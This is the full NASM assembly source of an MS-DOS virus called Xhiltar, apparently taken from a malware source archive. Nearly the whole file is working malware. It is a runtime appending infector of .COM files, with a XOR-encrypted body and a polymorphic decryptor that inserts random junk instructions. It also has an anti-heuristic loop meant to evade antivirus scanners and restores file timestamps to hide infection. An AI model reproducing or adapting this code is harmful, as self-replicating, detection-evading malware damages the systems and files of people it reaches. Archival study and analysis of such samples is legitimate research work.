MalwareSourceCode/MSDOS/Virus.MSDOS.Xhiltar.asm
vxunderground 9432413cf6 mov fix
2022-08-21 04:23:18 -05:00

151 lines
3.6 KiB
NASM

; The Xhiltar Virus
; By Arsonic[Codebreakers]
; Type: Runtime Appending Com Infector
; Encrypted: Yes
; Polymorphic: Yes
; Time/Date: Yes
; add Attrib: Yes
; Changes Directory's: Yes (dotdot method)
; Anti-Anti-Virus: Yes (anti-heuristics)
db 0e9h,0,0
start:
call delta
delta:
pop bp
sub bp,offset delta
mov cx,0ffffh ;fuck up those heristics!
fprot_loopy:
jmp back
mov ax,4c00h
int 21h
back:
loop fprot_loopy
lea si,[bp+hidden_start]
mov di,si
mov cx,end - hidden_start
call encryption
jmp hidden_start
value db 0
encryption: ;encryption routine
call poly
encrypt:
lodsb ;1
_1stDummy:
nop ;1 = +1
xor al,byte ptr[bp+value] ;4
_2ndDummy:
nop ;1 = +6
stosb ;1
_3rdDummy:
nop ;1 = +8
loop encrypt ;2
_4thDummy:
nop ;1 = +11
ret
hidden_start:
mov cx,3
mov di,100h ;restore the first 3 bytes
lea si,[bp+buff]
rep movsb
find_first: ;find first file
mov ah,4eh
find_next:
lea dx,[bp+filemask]
xor cx,cx ;with 0 attrib's..
int 21h
jnc infect
close:
push 100h
ret
infect:
mov ax,3d02h ;open file
mov dx,9eh
int 21h
xchg bx,ax
mov ax,5700h ;get time/date
int 21h
push dx ;save the values
push cx
in al,40h ;get new encrypt value from system clock
mov byte ptr [bp+value],al
mov ah,3fh ;read 3 bytes from the file.. too
mov cx,3 ;be replaced with a jump to the virus
lea dx,[bp+buff]
int 21h
mov ax,word ptr [80h + 1ah] ;check for infect
sub ax,end - start + 3
cmp ax,word ptr[bp+buff+1]
je close_file
mov ax,word ptr[80h + 1ah]
sub ax,3
mov word ptr[bp+three+1],ax
mov ax,4200h ;goto start of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the 3 byte jump
lea dx,[bp+three]
mov cx,3
int 21h
mov ax,4202h ;goto end of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the unencrypted area
lea dx,[bp+start]
mov cx,hidden_start - start
int 21h
lea si,[bp+hidden_start] ;encrypt the virus
lea di,[bp+end]
mov cx,end - hidden_start
call encryption
mov ah,40h ;write encrypted area
lea dx,[bp+end]
mov cx,end - hidden_start
int 21h
close_file:
mov ax,5701h ;restore time/date
pop cx ;with saved values
pop dx
int 21h
mov ah,3eh ;close file
int 21h
mov ah,4Fh ;find next file
jmp find_next
poly:
call random ;get random value
mov [bp+_1stDummy],dl ;write random do-nothing call to encrypt
call random
mov [bp+_2ndDummy],dl
call random
mov [bp+_3rdDummy],dl
call random
mov [bp+_4thDummy],dl
ret
garbage:
nop ; no operation instruction
clc ; Clear Carry
stc ; Set Carry
sti ; Set Interuppt Flag
cld ; Clear Direction Flag
cbw ; Convert byte to word
inc dx ; increase dx
dec dx ; decrease dx
lahf ; loads AH with flags
random:
in ax,40h
and ax,7
xchg bx,ax
add bx,offset garbage
add bx,bp
mov dl,[bx]
ret
filemask db '*.com',0
three db 0e9h,0,0
buff db 0cdh,20h,0
dotdot db '..',0
author db 'Arsonic[Codebreakers]',13,10,'$'
virus db 'the XHiLTAR virus',13,10,'$'
db 'I LOVE U LISA',13,10,'$'
db 'I LOVE U SOOOO MUCH!',13,10,'$'
end: